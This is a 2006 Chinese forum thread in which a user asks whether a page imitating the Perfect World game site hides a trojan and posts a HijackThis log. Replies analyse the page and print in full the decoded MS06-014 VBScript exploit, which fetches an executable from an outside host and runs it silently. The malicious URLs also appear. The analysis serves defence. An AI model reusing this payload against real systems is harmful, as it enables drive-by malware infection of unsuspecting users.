http://www.gamernop.com/hh/31/index.htm 这个网页是我在论坛里看到的图片点开后的连接，但我发现点开后连接的位置不是指向现在我所在的网页`所以我怀疑有木马病毒，这个网页做的和完美世界官方网一样`我觉得很有可能有木马，希望大家一起测试下。
HijackThis_zww汉化版扫描日志 V1.99.1
保存于      21:15:20, 日期 2006-11-17
操作系统：  Windows XP SP2 (WinNT 5.01.2600)
浏览器：    Internet Explorer v6.00 SP2 (6.00.2900.2180)

当前运行的进程：         
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\KAV2005\KWatch.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\cisvc.exe
C:\KAV2005\KPfwSvc.EXE
C:\KAV2005\KAVStart.exe
C:\WINDOWS\system32\ctfmon.exe
C:\KAV2005\KMailMon.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\cidaemon.exe
C:\Program Files\Internet Explorer\iexplore.exe
E:\QQbata3\QQ.exe
C:\Program Files\Tencent\QQ\TIMPlatform.exe
D:\hijacktihs\HijackThis1991汉化版\HijackThis1991zww.exe

O2 - BHO: IeCatch2 Class - {A5366673-E8CA-11D3-9CD9-0090271D075B} - C:\PROGRA~1\FLASHGET\jccatch.dll
O3 - IE工具栏增项: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - C:\PROGRA~1\FLASHGET\fgiebar.dll
O3 - IE工具栏增项: 金山快译(&K) - {6C3797D2-3FEF-4cd4-B654-D3AE55B4128C} - C:\FASTAI~1\IEBand.dll
O3 - IE工具栏增项: BitCometBar - {3F1ABCDB-A875-46c1-8345-B72A4567E486} - D:\BT\BitComet\BitCometBar\BitCometBar0.1.dll
O4 - 启动项HKLM\\Run: [KavStart] "C:\KAV2005\KAVStart.exe" -startup
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - IE右键菜单中的新增项目: &使用迅雷下载 - D:\QQ\geturl.htm
O8 - IE右键菜单中的新增项目: &使用迅雷下载全部链接 - D:\QQ\getallurl.htm
O8 - IE右键菜单中的新增项目: 上传到QQ网络硬盘 - E:\QQbata3\AddToNetDisk.htm
O8 - IE右键菜单中的新增项目: 使用网际快车下载 - C:\Program Files\FlashGet\jc_link.htm
O8 - IE右键菜单中的新增项目: 使用网际快车下载全部链接 - C:\Program Files\FlashGet\jc_all.htm
O8 - IE右键菜单中的新增项目: 加入POCO网摘(&K) - http://my.poco.cn/fav/rightClick.php
O8 - IE右键菜单中的新增项目: 我的POCO网摘(&O) - http://my.poco.cn/fav/open_myfav.php
O8 - IE右键菜单中的新增项目: 添加到QQ自定义面板 - E:\QQbata3\AddPanel.htm
O8 - IE右键菜单中的新增项目: 添加到QQ表情 - E:\QQbata3\AddEmotion.htm
O8 - IE右键菜单中的新增项目: 用QQ彩信发送该图片 - E:\QQbata3\SendMMS.htm
O9 - 浏览器额外的按钮: 浩方对战平台 - {0A155D3C-68E2-4215-A47A-E800A446447A} - E:\浩方\浩方对战平台\GameClient.exe
O9 - 浏览器额外的按钮: QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - E:\QQbata3\QQ.EXE
O9 - 浏览器额外的“工具”菜单项: 腾讯QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - E:\QQbata3\QQ.EXE
O9 - 浏览器额外的按钮: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FLASHGET\flashget.exe
O9 - 浏览器额外的“工具”菜单项: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FLASHGET\flashget.exe
O9 - 浏览器额外的按钮: (no name) - {DEDEB80D-FA35-45d9-9460-4983E5A8AFE6} - C:\Program Files\Tencent\QQ\QQIEHelper.dll
O9 - 浏览器额外的“工具”菜单项: QQ炫彩工具条设置 - {DEDEB80D-FA35-45d9-9460-4983E5A8AFE6} - C:\Program Files\Tencent\QQ\QQIEHelper.dll
O14 - IERESET.INF: SEARCH_PAGE_URL=
O14 - IERESET.INF: START_PAGE_URL=
O16 - DPF: {5EC7C511-CD0F-42E6-830C-1BD9882F3458} (PowerPlayer Control) - http://download.ppstream.com/bin/powerplayer.cab
O16 - DPF: {E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153} (Rising Web Scan Object) - http://download.rising.com.cn/register/pcver/autoupgradepad/pcver2006new/OL2006.cab
O16 - DPF: {E787FD25-8D7C-4693-AE67-9406BC6E22DF} (CPasswordEditCtrl Object) - https://password.qq.com/download/qqedit.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{BA9D7058-3A66-49B3-9013-13C11FF5A722}: NameServer = 61.139.2.69 202.98.96.68
O20 - AppInit_DLLs: apihookdll.dll
O23 - NT 服务: Kingsoft Personal Firewall Service (KPfwSvc) - Kingsoft Corporation - C:\KAV2005\KPfwSvc.EXE
O23 - NT 服务: Kingsoft Antivirus KWatch Service (KWatchSvc) - Kingsoft Corporation - C:\KAV2005\KWatch.EXE

你提供的页面,有以下代码:
<iframe src="614.htm" name="com" width="0" height="0" frameborder="0"></iframe>

指向hxxp://www.gamernop.com/hh/31/614.htm

614.htm,unescape后可看到MS06-014 Exploit,下载
hxxp://www.gamernop.com/yycx/ahd31.exe 为g0ld.com
这是一个网友测试后给的，但我想知道病毒名字是什么，如何彻底查杀，我也用瑞星杀了，但现在时实检测还是经常报毒，我想可能是这个的原因

UP

你的那位网友说得很对，详细地说，http://www.gamernop.com/hh/31/614.htm的内容还原后那段利用漏洞的VBScript如下：
<script language="VBScript">
    on error resume next
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, "http://www.gamernop.com/yycx/ahd31.exe", False
    x.Send
    fsssname1="g0ld.com"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fsssname1= F.BuildPath(tmp,fsssname1)
    S.open
    S.write x.responseBody
    S.savetofile fsssname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fsssname1,"","","open",0
    </script>

http://www.gamernop.com/yycx/ahd31.exe瑞星貌似不报。

楼主说的“网友”，是否告知他是哪位？

TK？。。。。。

http://forum.ikaka.com/topic.asp?board=28&artid=8211328
TK
偶搞解密网页还是得到TK指点
当时偶不在，M就直接把TK给搬过来了，要不这点小代码哪能劳烦高手出面？

不过楼主问的实在不好回答：
现在我想了解下如何清除这个木马，还有就是他的运行方式和运行的条件（就是何时运行）。

如何清除这个木马，首先看看你有没有中。MS06-014漏洞也不算新了，补丁都出这么久了，楼主这么机警，有给系统打补丁的话，就不会中这个毒。之前不是叫楼主扫SREng日志的吗？怎么楼主一发帖变成了HijackThis日志？HijackThis日志没看出什么问题。如果楼主没有中，就不必太过关注。

他的运行方式和运行的条件，这个如何说才适合？用不用把它调用哪个windows的API函数都说出来？！运行方式是加载服务，运行条件是开机，这样行不行？！

你教教偶好了
介绍点电子档我学习下

【回复“轩辕小聪”的帖子】 恩，的确是TK。谢谢你们哈`明天我再来看现在没时间了

如何查看自己有没有种那个病毒？